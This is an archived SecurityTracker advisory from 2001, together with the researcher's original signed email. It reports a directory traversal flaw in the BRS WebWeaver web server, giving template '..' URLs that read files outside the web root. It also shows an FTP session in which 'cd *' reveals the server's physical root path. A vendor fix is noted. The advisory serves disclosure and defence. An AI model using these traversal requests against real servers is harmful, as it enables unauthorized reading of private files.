SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Web Server/CGI)  >   BRS WebWeaver Vendors:   Southam, Blaine R.
BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server
SecurityTracker Alert ID:  1001455
SecurityTracker URL:  http://securitytracker.com/id/1001455
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  May 21 2001
Original Entry Date:  Apr 28 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): v0.63
Description:   A vulnerability has been reported in BRS WebWeaver, a combined FTP and web server, that allows remote users to obtain files located outside of the server's web root directory. There is also a reported vulnerability in the FTP server that allows a remote user to determine the physical path of the FTP root directory.

By using relative paths (e.g., '..', '...') in the web URL, a remote user can obtain files located anywhere on the server.

The following URLs will trigger the web server vulnerability:

http://[targethost]/syshelp/../[any file outside the web root]
http://[targethost]/sysimages/../[any file outside the web root]
http://[targethost]/scripts/../[any file outside the web root]

The following is an illustration of the problem with the FTP server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>
Impact:   A remote user can obtain files locate anywere on the server and can determine the physical path of the FTP root directory.
Solution:   The vendor released a fixed version (0.64) to correct the problem. The latest version can be downloaded from http://bsoutham.home.dhs.org
Vendor URL:  bsoutham.home.dhs.org/ (Links to External Site)
Cause:   Access control error, Exception handling error, Input validation error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Has Released Fix) Re: BRS WebWeaver Web Server Allows Remote Users to Obtain Any File on the Server
The vendor has released a fix.


 Source Message Contents
Date:  Sat, 28 Apr 2001 15:57:20 -0800 (PDT)
Subject:  Vulnerabilities in BRS WebWeaver


--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb
Content-type: text/plain

----- Begin Hush Signed Message from joetesta@hushmail.com -----

Vulnerabilities in BRS WebWeaver



    Overview

BRS WebWeaver v0.63 is a combined ftp and web server available from
http://bsoutham.home.dhs.org.  Vulnerabilities exist in the web
server which allow remote users to break out of the web root using
relative paths (ie: '..', '...').  In addition, the ftp server
can be made to disclose the physical path of the ftp root.



    Details

The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]


The following is an illustration of the problem with the ftp server:

>ftp localhost
Connected to xxxxxxxxxxxx.rh.rit.edu.
220 BRS WebWeaver FTP Server ready.
User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> cd *
250 CWD command successful. "/*/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
c:\windows\desktop\*\*.* not found
226 File sent ok
ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
ftp>



    Solution

The web server root traversal vulnerabilities can be prevented by removing
all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
ISAPI/CGI alias (ie: 'scripts').  There is no solution for the ftp root
disclosure vulnerability.



    Vendor Status

Blaine R Southam was contacted via <bsoutham@iname.com> on
Saturday, April 21, 2001.  No reply was received.



    - Joe Testa

e-mail:   joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
CVqvkyjBiGMOAQcLrFNKLcRZLBW13KOe9d2JMMIzTrZhsT9l2ihsNcFO3G/yGOL2qAIx
kMC9Z2ijFy/RRJEC02qDgHcL1vEMEq2LlU3cpY+zb3yZ8jb6AarulkaGbw4eEjD1R7ER
t/Gyq2X++pHMSlsMU7151N9H5Vl4WcjsU/7kJQHqgglKD2EtjhdHi3BgWnBhyqVa8Mp/
IaVjpWAC3Pxa3kp3jdJ2IE4OE399GMh1brJJGAb/spWiAXbE+pTKq6Llu35DCex2QgtL
n0LjgAsWom6PdZzCFyi6nfLvToMt1xr5TbJDnG0dvS6FYjQbiubcLRUEi+K1qSvE5+RD
N+yAyPda+trSaJLd1O6o/kNse2KvntAtlexC/hRdrPxjX5F0guoFfaNhgPBQrssInM/+
gk6lgWNaEUV/AxyCRUvqenkMkBd19alQ5M6dY+XEpdDIB4/Mo9xic/ekbSmqcNmOHKyX
T/DX0EMDxts6GI715LXY0Imv1jx52X1CuMGvBaVtuOal
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature. 
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_VOXHqUfoJPieaabqQkHXnNfFDRNpLmrb--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC